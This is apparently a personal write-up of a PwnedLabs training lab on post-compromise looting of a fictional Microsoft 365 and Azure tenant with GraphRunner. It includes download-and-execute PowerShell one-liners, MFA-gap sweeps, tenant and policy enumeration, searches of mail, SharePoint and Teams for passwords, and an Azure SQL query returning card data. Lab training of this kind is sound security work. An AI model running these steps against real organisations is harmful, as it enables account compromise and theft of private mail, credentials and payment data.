4. Loot Exchange, Teams and SharePoint with GraphRunner

This write-up is based on PwnedLabs.io’s free module, Loot Exchange, Teams and SharePoint with GraphRunner, which offers top-notch content at an unbeatable price. While I’m not affiliated with PwnedLabs.io, I highly recommend their resources. Learn more about their subscription options at PwnedLabs.io/pricing.

Start with Credentials

#### Azure credentials

##### Password: *****

##### IAM User: Clara.Miller@megabigtech.com

Key Takeaways

  1. Identify MFA-enabled and disabled services!

1. MFA Sweeps

Download MFA Sweeps:

IEX (iwr 'https://raw.githubusercontent.com/dafthack/MFASweep/master/MFASweep.ps1')

Invoke-MFASweep -Username Clara.Miller@megabigtech.com -Password ***** -Recon -IncludeADFS

It will output a lot of data. The last table summarizes the results well.

The second thing I noticed was a sentence in blue:
ADFS does not appear to be in use. Authentication appears to be managed by Microsoft.

1.1 What is ADFS and What Does This Mean?

Active Directory Federation Services (ADFS) is a tool that helps connect a company's local network (on-premises) to cloud services. It allows employees to use their regular work login to access both on-premises apps and cloud apps without needing a separate cloud password. It is similar to a single sign-on service. More information can be found here: ../Azure Services/Active Directory Federation Services (ADFS).

This made me curious about other authentication methods.

../Azure General/IAM/How does a user authenticate to the cloud?

Hence, ADFS does not appear to be in use. Authentication appears to be managed by Microsoft. It seems the authentication is solely handled by Microsoft's cloud identity service, possibly Entra ID.

1.2 What is Microsoft Graph API?

../Azure Services/Microsoft Graph

Simply put, Microsoft Graph is a gateway to Microsoft cloud services, and Graph API is how we, as users, can access Microsoft Graph.

1.3 What is Microsoft API Management?


../Azure Services/Azure API Management

Azure API Management is a way to manage various APIs.

Azure API Management is a hybrid, multicloud management platform for APIs across all environments. As a platform-as-a-service, API Management supports the complete API lifecycle.

2. Walkthrough

  1. Get credentials.

  2. Check MFA-enabled/disabled services using MFA Sweeps. #1. MFA Sweeps

  3. Log in and retrieve assigned Microsoft 365 licenses. ../Azure Services/Microsoft Graph

    PS> Connect-MgGraph
    PS> Get-MgUserLicenseDetail -UserId "Clara.Miller@megabigtech.com"
    Id                                          SkuId                                SkuPartNumber
    --                                          -----                                -------------
    78yQJX1oO0mujUQcurY6chhRVTtq2hhEiU998eIJaHA 3b555118-da6a-4418-894f-7df1e2096870 O365_BUSINESS_ESSENTIALS

    Ironically, I no longer see the Business Essentials plan listed among Microsoft business plans.

  4. Enumerate Graph API. ../Azure Services/Microsoft Graph

    Knowing that the user account has an assigned Microsoft 365 license and access to Graph API and API Management services, we can enumerate further.

    IEX (iwr 'https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1')

    According to Black Hills, GraphRunner is a post-exploitation tool used to gather information about the Graph API. Video.

    We built a post-compromise toolset called GraphRunner for interacting with the Microsoft Graph API.

GraphRunner tool information can be found here: ../Azure Services/Microsoft Graph#4.2 Complete Workflow of System Information Gaining.

2.1 Start Authentication with GraphRunner

After logging in, the first step is to authenticate with the system. ../Azure Services/Microsoft Graph#4.2.1 Authentication Flow.

The Get-GraphTokens command was really simple. All I had to do was log in with the given code and enter Clara's credentials. Once the authentication process was complete, the token was saved in the $token variable.

PS> Get-GraphTokens                                                                                                                                        
[*] It looks like you already have tokens set in your $tokens variable. Are you sure you want to authenticate again?                                              
[*] Initiating device code login...                                           
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code AGVQ7MD48 to authenticate. 

However, Get-AzureAppTokens requires a bit more information.

PS> Get-AzureAppTokens                                                      

cmdlet Get-AzureAppTokens at command pipeline position 1
Supply values for the following parameters:                                   
Get-AzureAppTokens: Cannot bind argument to parameter 'Scope' because it is an empty string.

2.2 Recon and Enumeration

Once I had the user's login information, instead of following the walkthrough, I decided to have a little more fun.

Let's use the ../Azure Services/Microsoft Graph#4.2.2 Recon & Enumeration Flow.

2.2.1 Invoke-GraphRecon

PS> Invoke-GraphRecon -Tokens $tokens                                                                                              
[*] Using the provided access tokens.                                       
[*] Refreshing token to the Azure AD Graph API...                           
[*] Now trying to query the MS provisioning API for organization settings.                                                                                   
Main Contact Info                                                                
Display Name: Default Directory                                                  
Street: 165 The Broadway                                                         
City: London                                                                     
Postal Code: SW19 1NE                                                            
Country: GB                                                                      
Technical Notification Email: ian@cloudpwned.com                                 
Telephone Number:                                                                
Directory Sync Settings                                                          
Initial Domain: iancloudpwned.onmicrosoft.com                                    
Directory Sync Enabled: true                                                     
Directory Sync Status: Enabled                                                   
Directory Sync Client Machine: DCNY02                                            
Directory Sync Service Account: Sync_DCNY02_8668877016c3@iancloudpwned.onmicrosoft.com                           
Password Sync Enabled: true                                                      
User Settings                                                                    
Self-Service Password Reset Enabled: true                                        
Users Can Consent to Apps: true                                                  
Users Can Read Other Users: true                                                 
Users Can Create Apps: false                                                     
Users Can Create Groups: false                                                   
Additional Service Parameters                                                    
RootAdminUrl : https://iancloudpwned-admin.sharepoint.com/                       
RootIWSPOUrl : https://iancloudpwned-my.sharepoint.com/                          
SPO_RootSiteUrl : https://iancloudpwned.sharepoint.com/                          
SPO_TenantUpgradeUrl : https://iancloudpwned-admin.sharepoint.com/               
SPO_TenantAdminUrl : https://iancloudpwned-admin.sharepoint.com/ 
SPO_TenantAdmin_CreateSiteCollectionUrl : https://iancloudpwned-admin.sharepoint.com/_layouts/15/online/CreateSiteFull.aspx      
SPO_TenantAdmin_ViewSiteCollectionsUrl : https://iancloudpwned-admin.sharepoint.com/                                            
SPO_TenantAdmin_ProjectAdminUrl : https://iancloudpwned-admin.sharepoint.com/    
SPO_MySiteHostUrl : https://iancloudpwned-my.sharepoint.com/                     
SPO_MySiteHost_NewsFeedUrl : https://iancloudpwned-my.sharepoint.com/default.aspx                                                
SPO_MySiteHost_DocumentsUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllDocuments           
SPO_MySiteHost_SitesUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllSites                 
SPO_MySiteHost_AboutMeUrl : https://iancloudpwned-my.sharepoint.com/person.aspx  
SPO_MySiteHost_ProjectSiteUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/MyProjects.aspx                                  
SPO_PublicWebSiteUrl : NotSupported                                           
SPO_PublicWebSitePublicUrl :                                                     
SPO_LegacyPublicWebSiteUrl :                                                    
SPO_LegacyPublicWebSiteEditPage : Pages/Forms/AllItems.aspx             
SPO_LegacyPublicWebSitePublicUrl :                                             
OfficeGraphUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/me.aspx     
SPO_RegionalRootSiteUrl : https://iancloudpwned.sharepoint.com/                  
StreamLaunchConfig : 21                                                        
ShowSkyDrivePro_InitialVisibility : True                                         
ShowYammerNewsFeed_InitialVisibility : True                                
ShowSites_InitialVisibility : True                                              
ServiceInformation_LastChangeDate : 9/11/2024 5

:39:21 AM                       
InstanceId : 7dff6839-e224-45de-b8cd-042646389e73                                
EnableOneDriveforSuiteUsers : False                                            
YammerEnterprise_AdminUrl : https://www.yammer.com/iancloudpwned.onmicrosoft.com/admin                                                                       
Authorization Policy Info                                                        
Allowed to create app registrations (Default User Role Permissions): False    
Allowed to create security groups (Default User Role Permissions): False   
Allowed to create tenants (Default User Role Permissions): False      
Allowed to read Bitlocker keys for own device (Default User Role Permissions): True                                        
Allowed to read other users (Default User Role Permissions): True   
Who can invite external users to the organization: adminsAndGuestInviters  
Users can sign up for email-based subscriptions: True        
Users can use Self-Serve Password Reset: True     
Users can join the tenant by email validation: False       
Users can consent to risky apps: False    
Block MSOL PowerShell: False          
Guest User Role Template ID: 10dae51f-b6af-4016-8d66-8c2a99b929b3        
Guest User Policy: Guest users have limited access to properties and memberships of directory objects     

From the above information, I attempted to log in to the SharePoint website. However, MFA authentication was enabled.

2.2.2 Invoke-DumpCAPS

Under the Clara Miller section, I found something interesting.

Excluded Applications: 14d82eec-204b-4c2f-b7e8-296a70dab67e, 797f4846-ba00-4fd7-ba43-dac1f8f63013. I was not able to log in to the Azure Portal with Clara's credentials, but Google helped me.


It seems like 797f4846-ba00-4fd7-ba43-dac1f8f63013 is generally Azure API Management, and 14d82eec-204b-4c2f-b7e8-296a70dab67e is the SDK App. ../Azure Services/SDKs

PS> Invoke-DumpCAPS -Tokens $tokens
Display Name: Require MFA for Clara Miller
Policy Type: 18
Policy State: Enabled
                        Applications: All
                        Applications: 14d82eec-204b-4c2f-b7e8-296a70dab67e, 797f4846-ba00-4fd7-ba43-dac1f8f63013

                        Users: 36fa333d-1720-4920-8a5c-2b9b696c6adf

                        ClientTypes: Browser, EasSupported, EasUnsupported, OtherLegacy, LegacySmtp, LegacyPop, LegacyImap, LegacyMapi, LegacyOffice

Controls: MFA

Earlier in #1. MFA Sweeps, Graph API and API management were the ones where MFA was not enabled.

For now, I will just move on to the next step.

2.2.3 Invoke-DumpApps

It will dump a list of Azure app registrations from the tenant, including permission scopes and users that have consented to the apps.

This commands spit out good chunk of data. Some results were worth to note.
One key point was 14d82eec-204b-4c2f-b7e8-296a70dab67e was previously identified with Invoke-DumpCAPS command. #2.2.2 Invoke-DumpCAPS.
According to the Invoke-DumpApps, 14d82eec-204b-4c2f-b7e8-296a70dab67e is for an external App, Microsoft Graph Command Line Tools.

PS> Invoke-DumpApps -Tokens $tokens 

App Name: megabigtech-dev (App ID: 378ac9d7-056c-49d7-8ea0-e86250e1fb9a)         
Creation Date: 12/18/2023 21:03:27                                               
Audience: AzureADMyOrg                                                   
Consented User: Ian Austin (User ID: 18600f1a-3cee-434e-860f-aff4078da055)       
Consented User: Budi Setiawan (User ID: f851f8c9-1105-4f57-aa77-d4c440dfb16a)    
Consented User: Annette Palmer (User ID: 9861fd14-539c-4f98-becf-ce2c9eac3c99)   
Delegated Permissions (Scopes): User.Read     


External App: PowerShell.MSGraph                    
AppId: 5e79add2-6288-4d91-bebc-cae920227404            
Object ID: c25378ab-f923-49d2-8616-7119f4eecc57       
appOwnerOrganizationId: 9188040d-6c67-4c5b-b112-36a304b66dad     
Creation Date: 05/31/2024 19:05:55                    
Scope of Consent:                                    
offline_access, Delegated, Clara.Miller@megabigtech.com   
openid, Delegated, Clara.Miller@megabigtech.com   

External App: Graph Explorer                         
AppId: de8bc8b5-d9f9-48b1-a8ad-b748da725064           
Object ID: 881df9b0-62d7-4dfc-8bfa-3f358bf7cd9b      
appOwnerOrganizationId: 72f988bf-86f1-41af-91ab-2d7cd011db47  
Creation Date: 12/07/2023 14:04:22                     
Scope of Consent:                                     
Line |                                                
3531 |  … serobject = Invoke-RestMethod -uri "$($graphApiUrl)/users/$userorgrou …                                                      
     |                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                        
     | {"error":{"code":"TooManyRequests","message":"Too many requests from Identifier:d3590ed6-52b3-4102-aeff-aad2292ab01c under categ
ory:aadgraph.app. Please try again later.","innerError":{"date":"2024-09-12T14:19:55"}}}                                               

External App: Microsoft Graph Command Line Tools       
AppId: 14d82eec-204b-4c2f-b7e8-296a70dab67e            
Object ID: 7176f94c-6797-4cea-b5a6-172aeddf7d14       
appOwnerOrganizationId: 72f988bf-86f1-41af-91ab-2d7cd011db47 
Creation Date: 10/12/2023 17:11:27
Scope of Consent:

At one point, I was getting Too many requests.... error.

Line |                                                                                                                                 
3531 |  … serobject = Invoke-RestMethod -uri "$($graphApiUrl)/users/$userorgrou …                                                      
     |                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                        
     | {"error":{"code":"TooManyRequests","message":"Too many requests from Identifier:d3590ed6-52b3-4102-aeff-aad2292ab01c under category:aadgraph.app. Please try again later.","innerError":{"date":"2024-09-12T14:19:28"}}}                                               
user_impersonation, Delegated,                                                                                                         

2.2.4 Get-AzureADUsers

This commands spits out all ADUsers.

PS> Get-AzureADUsers -Tokens $tokens            
cmdlet Get-AzureADUsers at command pipeline position 1             
Supply values for the following parameters:                        
outfile: test.txt                
[*] Gathering the users from the tenant.                           
---All Azure AD User Principal Names---                                                                                  
Discovered 71 users

2.2.5 Get-SecurityGroups

No luck with Get-SecurityGroups.

PS> Get-SecurityGroups -Tokens $tokens
[*] Using the provided access tokens.
[*] Retrieving a list of security groups and their members from the directory...
[*] An error occurred while retrieving security groups: Response status code does not indicate success: 429 ().

2.2.6 Get-SharePointSiteURLs

The result of Get-SharePointSiteURLs, displays share point site URLs. Clara's account is MFA authenticated. However, I was able to take a look the site with Security-user credentials.

With that, we got more credentials. Yeah. However, This is not intended way for this lab.

PS> Get-SharePointSiteURLs -Tokens $tokens
[*] Using the provided access tokens.
[*] Now getting SharePoint site URLs...
[*] Found a total of 14 site URLs.
Web URL: https://iancloudpwned.sharepoint.com/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/allcompany/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/allcompany/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/allcompany/Style Library/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/SiteAssets/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/Style Library/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/SiteAssets/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Style Library/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/Style Library/Forms/AllItems.aspx

2.2.7 Invoke-GraphOpenInboxFinder

We confirmed that we can read Clara's mailbox. It makes total sense because we are using Clara's credentials.

PS> Invoke-GraphOpenInboxFinder -Tokens $tokens                   

cmdlet Invoke-GraphOpenInboxFinder at command pipeline position 1
Supply values for the following parameters:
userlist: ./test.txt
[*] Note: To read other user's mailboxes your token needs to be scoped to the Mail.Read.Shared or Mail.ReadWrite.Shared permissions.

[*] Checking access to mailboxes for each email address...

[*] SUCCESS! Inbox of Clara.Miller@megabigtech.com is readable.                                                         
Latest Email Received 11/06/2023 14:51:57 with subject: Quick Heads-Up on This Month's Recons!
70 of 71 mailboxes checked

2.3 Pillage Flow

2.3.1 Invoke-SearchSharePointAndOneDrive

So fortunately, this command support the wild card character and download files. Since I am using pwsh from linux, I tried to read those files with O365.

However, You need permission to access this item. So it is interesting to me that Clara has privilege to download, but I need her MFA device to use GUI. With Security-user credential, I can view limited files.

PS> Invoke-SearchSharePointAndOneDrive -searchTerm * -Tokens $tokens    
[*] Using the provided access tokens.                                
[*] Found 14 matches for search term *                              
Result [0]                                                        
File Name: passwords.xlsx                                        
Location: https://iancloudpwned.sharepoint.com/Shared Documents/passwords.xlsx 
Created Date: 03/27/2024 00:13:10                    
Last Modified Date: 07/22/2024 08:20:00       
Result [1]

File Name: Bonuses - Confidential.xlsx
Location: https://iancloudpwned-my.sharepoint.com/personal/sam_olsson_megabigtech_com/Documents/Bonuses - Confidential.xlsx

https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Finance Logins.docx 

Result [3]                        
File Name: Finance Logins.docx                       
Location: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Finance Logins.docx       
Result [4]                                                       
File Name: Document.docx                                                    
Location: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Document.docx 
Result [5]               
File Name: Default Directory Notebook                                       
Location: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/SiteAssets/Default Directory Notebook 
Result [6]                                
File Name: __siteIcon__.jpg                                                 
Location: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/SiteAssets/Forms/DispForm.aspx?ID=2    ...snip...

It is such a pain to view Excel file in Linux, hence I decided to cheat little bit. I used Security-User credentials to view the content.

2.3.2 Invoke-SearchMailbox

PS> Invoke-SearchMailbox -SearchTerm * -Tokens $tokens                                                                                                                                     
[*] Using the provided access tokens.                                                         
[*] Found 98 matches for search term *                                                                                                                                                       
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Ols
son | Date: 11/06/2023 17:24:50 | Message Preview: Hi Sam, IT have set up our access to the subscriptions database, so we can start pulling on this data for the quarterly management metrics
. Shared login below: Username: ...                                                                                                                                                          
Subject: RE: Quick Heads-Up on This Month's Recons! | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-1
7 | Receivers: Sam Olsson | Date: 11/06/2023 14:59:37 | Message Preview: Sounds good. Thanks! From: Sam Olsson <Sam.Olsson@megabigtech.com> Sent: Monday, November 6, 2023 2:52 PM To: Clara 
Miller <Clara.Miller@megabigtech.com> Subject: Quick Heads-Up on...                           
Subject: Quick Heads-Up on This Month's Recons! | Sender: Sam.Olsson@megabigtech.com | Receivers: Clara Miller | Date: 11/06/2023 14:51:56 | Message Preview: Hey Clara, Hope you're doing we
ll! Just wanted to drop you a quick note about the reconciliations we've got lined up for the end-of-month close. Here's what's on the deck: Bank ...
[*] Do you want to download these emails and their attachments? (Yes/No)
WARNING: Resulting JSON is truncated as serialization has exceeded the set depth of 2.
[*] Emails and attachments have been exported to the folder mailsearch-20240912115820.        
[*] A simple emailviewer.html has been provided to view the exported emails.
[*] To use it run the Invoke-HTTPServer module in the mailsearch-20240912115820 directory and then navigate to http://localhost:8000/emailviewer.html  

PS>  Invoke-HTTPServer

Another cool feature is that I can download emails and read it via web browser.

2.3.3 Invoke-SearchTeams

Invoke-SearchTeams -SearchTerm * -Tokens $tokens
[*] Using the provided access tokens.
[*] Refreshing token for Teams use...
From: Clara.Miller@megabigtech.com | Summary: Call IT to reset my password for accounting system
Full Message Body: <html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body><p>Call IT to reset my password for accounting system</p></body></html>
From: Clara.Miller@megabigtech.com | Summary: password: *****
Full Message Body: <html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body><p>password: *****</p></body></html>

2.3.4 Get-TeamsChat

PS> Get-Teamschat -Tokens $tokens
[*] Using the provided access tokens.
[*] Now getting Teams chat conversations for current user.
Line |
2833 |  … sResponse = Invoke-RestMethod -Uri "$graphBaseUrl$chatEndpoint" -Head …
     |                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     | {"error":{"code":"Forbidden","message":"Missing scope permissions on the request. API requires one of 'Chat.ReadBasic, Chat.Read, Chat.ReadWrite'. Scopes on the request 'AuditLog.Create, AuditLog.Read.All, Calendar.ReadWrite, Calendars.Read.Shared, Calendars.ReadWrite, Contacts.ReadWrite, DataLossPreventionPolicy.Evaluate, Directory.AccessAsUser.All, Directory.Read.All, Files.Read, Files.Read.All, Files.ReadWrite.All, Group.Read.All, Group.ReadWrite.All, InformationProtectionPolicy.Read, Mail.ReadWrite, Mail.Send, Notes.Create, Organization.Read.All, People.Read, People.Read.All, Printer.Read.All, PrinterShare.ReadBasic.All, PrintJob.ReadWriteBasic, SensitiveInfoType.Detect, SensitiveInfoType.Read.All, SensitivityLabel.Evaluate, Tasks.ReadWrite, TeamMember.ReadWrite.All, TeamsTab.ReadWriteForChat, User.Read.All, User.ReadBasic.All, User.ReadWrite, Users.Read'","innerError":{"date":"2024-09-12T18:59:37","request-id":"2353bfdc-e820-451a-91d5-a0bf65f61ad2","client-request-id":"2353bfdc-e820-451a-91d5-a0bf65f61ad2"}}}
No chats found for the authenticated user.

2.2 Continue with the Walkthrough.

I used the Google Doc to read the word document.
If you don't love Database, you are not a tester!! However, this is not possible to access by just looking at the URL.

Service/Account: Finance Database


Username: finadmin

Password: *****


Service/Account: Accounting Software

URL: https://accounting.megabigtech.local

Username: accounting_user

Password: *****


Service/Account: Payroll System

URL: https://payrollonlinembt.corp.net

Username: payrollmanager

Password: *****


Service/Account: Bank Portal

URL: https://onlinebanking.megabank.com

Username: finusermbt

Password: *****


Service/Account: Expense Reporting

URL: https://expenses.megabigtech.local

Username: expensereport_user

Password: *****

Also, manage to open the Bonuses file.

So earlier on #2.3.2 Invoke-SearchMailbox, I used Invoke-SearchMailbox command to view the mailbox. And I thought the wild character * was consider as all. Once I read the actual lab, I realize that was a mistake. So let's take a look at it.

PS> Invoke-SearchMailbox -Tokens $tokens -SearchTerm "Clara" -MessageCount 80
[*] Using the provided access tokens. 
[*] Found 15 matches for search term Clara                                                    
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Ols
son | Date: 11/06/2023 17:24:50 | Message Preview: ...windows.net Database: Finance Clara ...
Subject: Quick Heads-Up on This Month's Recons! | Sender: Sam.Olsson@megabigtech.com | Receivers: Clara Miller | Date: 11/06/2023 14:51:56 | Message Preview: Hey Clara, Hope you're doing we
ll! Just wanted to drop you a quick note about the reconciliations we've got lined up for the end-of-month close. Here's what's on the deck: Bank ...
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Ols
son | Date: 11/06/2023 17:24:50 | Message Preview: ...windows.net Database: Finance Clara ...
Subject: RE: Quick Heads-Up on This Month's Recons! | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-1
7 | Receivers: Sam Olsson | Date: 11/06/2023 14:59:37 | Message Preview: ...6, 2023 2:52 PM To: Clara Miller <Clara.Miller@megabigtech.com> Subject: Quick Heads-Up on This Month's Recons! H
ey Clara, Hope you're doing well! Just wanted to drop you a quick ...   
Subject: Quick Heads-Up on This Month's Recons! | Sender: Sam.Olsson@megabigtech.com | Receivers: Clara Miller | Date: 11/06/2023 14:51:56 | Message Preview: Hey Clara, Hope you're doing we
ll! Just wanted to drop you a quick note about the reconciliations we've got lined up for the end-of-month close. Here's what's on the deck: Bank ...
[*] Do you want to download these emails and their attachments? (Yes/No)

PS> Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40
[*] Using the provided access tokens.
[*] Found 5 matches for search term password
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Olsson | Date: 11/06/2023 17:24:50 | Message Preview: ...login below: Username: financereports Password: $********** Server: mbt-finance.database.windows.net Database: Finance Clara ...
[*] Do you want to download these emails and their attachments? (Yes/No)

See the difference? I missed the critical information.
It seems like some sort of database is needed. What do I know about database here? Nothing. So let's dig a little bit. With knowing that this is for the SQL database, we can use the database enumeration commands.
../Azure Services/Azure SQL#2.1 For database

So here are knows.

Username: financereports
Password: ******
Server: mbt-finance.database.windows.net
Database: Finance

It turns out there is a sql server I can connect to. FQND indicates the server name.

 az sql server list
    "administratorLogin": "manager",
    "fullyQualifiedDomainName": "mbt-finance.database.windows.net",
    "id": "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2/providers/Microsoft.Sql/servers/mbt-finance",
    "location": "eastus",
    "minimalTlsVersion": "1.2",
    "name": "mbt-finance",
    "resourceGroup": "content-static-2",
    "type": "Microsoft.Sql/servers",
    "version": "12.0",

We got the same information. I guess this command will only pull the specific server.

PS> az sql server show --resource-group "content-static-2" --name "mbt-finance"
  "administratorLogin": "manager",
  "fullyQualifiedDomainName": "mbt-finance.database.windows.net",
  "id": "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2/providers/Microsoft.Sql/servers/mbt-finance",
  "name": "mbt-finance",
  "type": "Microsoft.Sql/servers",
  "version": "12.0",
  "workspaceFeature": null

2.2.1 Accessing Azure SQL database with sqlcmd

../Azure Services/Azure SQL#3.1 sqlcmd

So instead of using the GUI from the lab, I decided to go with sqlcmd!!

Login with the given information. For no reason, check the version of the database.

./sqlcmd -S mbt-finance.database.windows.net -U financereports -d Finance   

1> select @@version                                
2> go                                                                            
Microsoft SQL Azure (RTM) - 12.0.2000.8                                                                                                                      
        Sep  3 2024 11:34:29                                                                                                                                 
        Copyright (C) 2022 Microsoft Corporation        

Then get the database information. I see two databases are available.

1> SELECT name FROM sys. databases;    
2> go


Here I decided to with the Finance. So as we can see, I already have information of database. I need table and column information.

1> use Finance
2> go
Changed database context to 'Finance'.

1> select table_name from information_schema.Tables
2> go


1> select column_name from information_schema.columns
2> go


(12 rows affected)

So I identified the needed information and found the flag!

1> select * from Subscribers                                                
2> go                                                                                                                                                        SubscriberID                         CardNumber          ExpiryDate       CVV FullName                                                                       
                      BirthDate                                                  ...snip...

ebb7c066-b630-4794-9d3a-06451a685b65 4532756279624064          2025-12-01 123 Alex Smith                                                                     
d4148d1d-f65e-45da-93fe-a47e39fa011b 5399832489200328          2023-11-01 311 Jamie Doe                                                                      


1> select fullname from Subscribers
2> go
Flag: 82b55974e50db8c02b4119a976c3570b      

2.2.2 Accessing Azure SQL database with Powershell

From the exercise, 4. Loot Exchange, Teams and SharePoint with GraphRunner

$conn = New-Object System.Data.SqlClient.SqlConnection
$conn.ConnectionString = "Server=mbt-finance.database.windows.net;Database=Finance;User ID=financereports;Password=$password;"

$sqlcmd = $conn.CreateCommand()
$sqlcmd.Connection = $conn
$query = "SELECT * FROM Subscribers;"
$sqlcmd.CommandText = $query
$adp = New-Object System.Data.SqlClient.SqlDataAdapter $sqlcmd
$data = New-Object System.Data.DataSet
$adp.Fill($data) | Out-Null
$data.Tables | ft

2.2.3 With VSCODE!

This was something I learned and thought this was really cool.